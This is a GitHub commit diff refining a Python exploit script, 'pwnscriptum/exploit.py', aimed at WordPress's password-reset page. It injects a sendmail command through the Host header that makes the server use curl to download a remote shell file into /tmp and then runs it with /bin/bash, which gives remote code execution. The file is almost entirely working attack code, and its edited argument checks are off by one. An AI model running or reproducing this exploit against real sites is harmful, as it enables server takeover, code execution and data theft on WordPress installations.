Skip to content

Commit 7eba228

Browse files
committed
refine exploit
1 parent 4e45351 commit 7eba228

1 file changed

Lines changed: 9 additions & 9 deletions

File tree

wordpress/pwnscriptum/exploit.py

Lines changed: 9 additions & 9 deletions
Original file line numberDiff line numberDiff line change
@@ -3,10 +3,10 @@
33
import sys
44

55
# wordpress's url
6-
target = 'http://127.0.0.1' if not sys.argv[1] else sys.argv[1]
6+
target = 'http://127.0.0.1' if len(sys.argv) < 1 else sys.argv[1]
77
# Put your command in a website, and use the website's url
88
# don't contains "http://", must be all lowercase
9-
shell_url = 'example.com/1.txt' if not sys.argv[2] else sys.argv[2]
9+
shell_url = 'example.com/1.txt' if len(sys.argv) < 2 else sys.argv[2]
1010
# an exists user
1111
user = 'admin'
1212

@@ -17,19 +17,19 @@ def generate_command(command):
1717
return 'target(any -froot@localhost -be %s null)' % command
1818

1919

20+
session = requests.session()
2021
data = {
2122
'user_login': user,
2223
'redirect_to': '',
2324
'wp-submit': 'Get New Password'
2425
}
25-
headers = {
26+
session.headers = {
2627
'Host': generate_command('/usr/bin/curl -o/tmp/rce ' + shell_url),
2728
'User-Agent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)'
2829
}
29-
proxies = {
30-
'http': 'http://127.0.0.1:8080'
31-
}
30+
session.allow_redirects = False
3231
target += '/wp-login.php?action=lostpassword'
33-
requests.post(target, headers=headers, data=data, proxies=proxies, allow_redirects=False)
34-
headers['Host'] = generate_command('/bin/bash /tmp/rce')
35-
requests.post(target, headers=headers, data=data, proxies=proxies, allow_redirects=False)
32+
session.post(target, data=data)
33+
34+
session.headers['Host'] = generate_command('/bin/bash /tmp/rce')
35+
session.post(target, data=data)

0 commit comments

Comments
 (0)